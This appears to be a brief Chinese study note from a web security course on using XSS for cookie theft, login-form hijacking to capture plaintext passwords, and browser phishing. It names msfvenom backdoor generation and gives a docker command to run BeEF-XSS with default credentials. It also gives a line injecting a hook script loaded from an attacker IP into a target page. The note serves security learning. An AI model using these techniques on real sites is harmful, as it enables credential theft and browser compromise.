本文主要是介绍XiaodiSec day037 Learn Note 小迪安全学习笔记,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
XiaodiSec day037 Learn Note 小迪安全学习笔记
记录得比较凌乱,不尽详细
day 37 XSS
跨站
前置
利用跨站做一些其他攻击
配合跨站能达到意想不到的效果
开始
权限维持
表单劫持(后台加密的密码不方便解密,考虑结合权限维持来劫持表单获得明文密码)
钓鱼攻击浏览器
适用 xss 盗取 cookie,
使用 xss 获得登录成功的 cookie,若目标网站有保护性的验证手段,就考虑其他方法
生成后门
msfvenom
目前的阶段先不考虑免杀
监听
msfconsole
通过网页浏览就能中后门
部署 BEEF-XSS
docker run --rm -p 3000:3000 janes/beef
访问localhost:3000/ui/authentication
beef/beef
即可在目标中写入script: ip:3000/hock.js
这篇关于XiaodiSec day037 Learn Note 小迪安全学习笔记的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
